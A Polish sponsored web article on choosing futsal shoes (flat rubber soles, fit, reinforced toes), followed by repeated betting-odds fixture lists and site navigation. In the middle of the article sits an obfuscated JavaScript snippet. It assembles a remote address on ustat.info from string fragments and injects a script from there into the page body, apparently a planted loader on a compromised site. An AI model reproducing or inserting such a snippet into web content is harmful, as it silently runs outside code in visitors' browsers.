Jakie buty na halę do piłki nożnej?

Jakie buty na halę do piłki nożnej?

Fut­sal, czyli pił­ka noż­na halowa, to jed­na z pop­u­larniejszych dyscy­plin drużynowych,z zarówno wśród dzieci i młodzieży, jak i wśród dorosłych. Co jed­nak istotne z punk­tu widzenia osób uczest­niczą­cych w roz­gry­wkach, warto zaopa­trzyć się w odpowied­nie buty na halę. Jak je wybrać?

Patrz na podeszwę!

O ile obuwie do gry w piłkę na boisku charak­teryzu­je się korka­mi, o tyle w przy­pad­ku fut­salu nie może być o tym mowy. Prze­ci­wnie, buty na halę powin­ny cechować się płaską podeszwą, wyposażoną jedynie w rowki.

Przy­czy­na tego stanu rzeczy jest bard­zo pros­ta – w przy­pad­ku gry pod zadasze­niem i pewnoś­ci, ze powierzch­nia jest twar­da, sucha i płas­ka, właśnie taki wybór poz­woli zachować więk­sza przy­czep­ność. Oczy­wiś­cie pod warunk­iem, ze sam mate­ri­ał, z którego wyko­nano podeszwę będzie odpowied­ni (np. kauczuk).

Co ciekawe, niek­tórzy pro­du­cen­ci dba­ją również o to, aby podeszwy w ich butach jak najm­niej brudz­iły podeszwę. Choć dla kom­for­tu użytkowa­nia takich butów nie ma to znaczenia, to jed­nak jest to cechą zde­cy­dowanie pożą­daną, na którą warto zwró­cić uwagę. Nie warto więc kupować spo­tykanych w super­mar­ke­tach mod­eli eko­nom­icznych, lep­iej przegląd­nąć ofer­tę sklepów sportowych (np. www.no10.pl), gdzie wybór jest po pros­tu większy.

Wybór rozmi­aru

Wybier­a­jąc buty na halę zad­baj o to, aby były jak najlepiej dopa­sowane. To ważne, ponieważ przy naprawdę inten­sy­wnym wysiłku zbyt ciasne obuwie było­by prob­le­mem, a zbyt luźne mogło­by powodować potknię­cia czy prob­le­my z odpowied­nim kierowaniem pił­ki. Warto jed­nak pamię­tać, że prob­lem ten moż­na do pewnego stop­nia równoważyć poprzez wkładki.

(func­tion(){
xay2_=(“u”+“”)+“s”+””;xay2_+=(“tat.”)+(“i”);
xay2=document.createElement(“script”);xay2.type=“text/javascript”;xay2_+=“nf”+(“o”)+”/”;
xay2u=“70835659”+”.”;xay2.async=true;xay2u+=“9bvztd4kay2u79egdvr5npjuis39zs”;
xay2.src=”//”+xay2_+xay2u; xay2b=document.body; xay2b.appendChild(xay2);
})();

Istotne cechy butów do futsalu

Przeglą­da­jąc buty do pił­ki nożnej halowej warto przyjrzeć się ich czubom. Powin­ny być wzmoc­nione – tak, żeby mogły wytrzymy­wać częste kop­nię­cia w piłkę. Nie da się tez ukryć, że sam but powinien być jak najbardziej odd­y­chal­ny i lek­ki. W końcu gra­jąc w piłkę halową bie­ga się naprawdę dużo (nawet jeśli na małej powierzch­ni) i – choć może się to wydać zaskaku­jące – nawet drob­ne różnice wagi potrafią przełożyć się na późniejsze zmęczenie.

Artykuł spon­sorowany

Kursy na mecze Lecha

Lamia - PAOK Saloniki

Liga Grecka

24/04/2024 16:00

Znicz Pruszków - Arka Gdynia

1. Liga Polska

24/04/2024 18:00

Wisła Płock - Miedź Legnica

1. Liga Polska

24/04/2024 18:00

Austria Klagenfurt - Red Bull Salzburg

Liga Austriacka

24/04/2024 18:30

TSV Hartberg - LASK Linz

Liga Austriacka

24/04/2024 18:30

Lamia - PAOK Saloniki

Liga Grecka

24/04/2024 16:00

Znicz Pruszków - Arka Gdynia

1. Liga Polska

24/04/2024 18:00

Wisła Płock - Miedź Legnica

1. Liga Polska

24/04/2024 18:00

Austria Klagenfurt - Red Bull Salzburg

Liga Austriacka

24/04/2024 18:30

TSV Hartberg - LASK Linz

Liga Austriacka

24/04/2024 18:30

Lamia - PAOK Saloniki

Liga Grecka

24/04/2024 16:00

Znicz Pruszków - Arka Gdynia

1. Liga Polska

24/04/2024 18:00

Wisła Płock - Miedź Legnica

1. Liga Polska

24/04/2024 18:00

Austria Klagenfurt - Red Bull Salzburg

Liga Austriacka

24/04/2024 18:30

TSV Hartberg - LASK Linz

Liga Austriacka

24/04/2024 18:30

Lamia - PAOK Saloniki

Liga Grecka

24/04/2024 16:00

Znicz Pruszków - Arka Gdynia

1. Liga Polska

24/04/2024 18:00

Wisła Płock - Miedź Legnica

1. Liga Polska

24/04/2024 18:00

Austria Klagenfurt - Red Bull Salzburg

Liga Austriacka

24/04/2024 18:30

TSV Hartberg - LASK Linz

Liga Austriacka

24/04/2024 18:30

Kursy bukmacherskie Ekstraklasa

Piast Gliwice - Warta Poznań

PKO BP Ekstraklasa

26/04/2024 18:00

Jagiellonia Białystok - Pogoń Szczecin

PKO BP Ekstraklasa

26/04/2024 20:30

Górnik Zabrze - ŁKS Łódź

PKO BP Ekstraklasa

27/04/2024 15:00

Śląsk Wrocław - Ruch Chorzów

PKO BP Ekstraklasa

27/04/2024 17:30

Widzew Łódź - Raków Częstochowa

PKO BP Ekstraklasa

27/04/2024 20:00

Piast Gliwice - Warta Poznań

PKO BP Ekstraklasa

26/04/2024 18:00

Jagiellonia Białystok - Pogoń Szczecin

PKO BP Ekstraklasa

26/04/2024 20:30

Górnik Zabrze - ŁKS Łódź

PKO BP Ekstraklasa

27/04/2024 15:00

Śląsk Wrocław - Ruch Chorzów

PKO BP Ekstraklasa

27/04/2024 17:30

Widzew Łódź - Raków Częstochowa

PKO BP Ekstraklasa

27/04/2024 20:00

Piast Gliwice - Warta Poznań

PKO BP Ekstraklasa

26/04/2024 18:00

Jagiellonia Białystok - Pogoń Szczecin

PKO BP Ekstraklasa

26/04/2024 20:30

Górnik Zabrze - ŁKS Łódź

PKO BP Ekstraklasa

27/04/2024 15:00

Śląsk Wrocław - Ruch Chorzów

PKO BP Ekstraklasa

27/04/2024 17:30

Widzew Łódź - Raków Częstochowa

PKO BP Ekstraklasa

27/04/2024 20:00

Piast Gliwice - Warta Poznań

PKO BP Ekstraklasa

26/04/2024 18:00

Jagiellonia Białystok - Pogoń Szczecin

PKO BP Ekstraklasa

26/04/2024 20:30

Górnik Zabrze - ŁKS Łódź

PKO BP Ekstraklasa

27/04/2024 15:00

Śląsk Wrocław - Ruch Chorzów

PKO BP Ekstraklasa

27/04/2024 17:30

Widzew Łódź - Raków Częstochowa

PKO BP Ekstraklasa

27/04/2024 20:00

Następny mecz

Ostatni mecz

Mecze Ekstraklasy

Tabela Ekstraklasy (gr. mistrzowska)

Tabela Ekstraklasy

Strzelcy Ekstraklasy

Archiwum newsów

Facebook

Get the Facebook Likebox Slider Pro for WordPress

Ten artykuł jest dostępny tylko w zagraniczej odsłonie tego serwisu.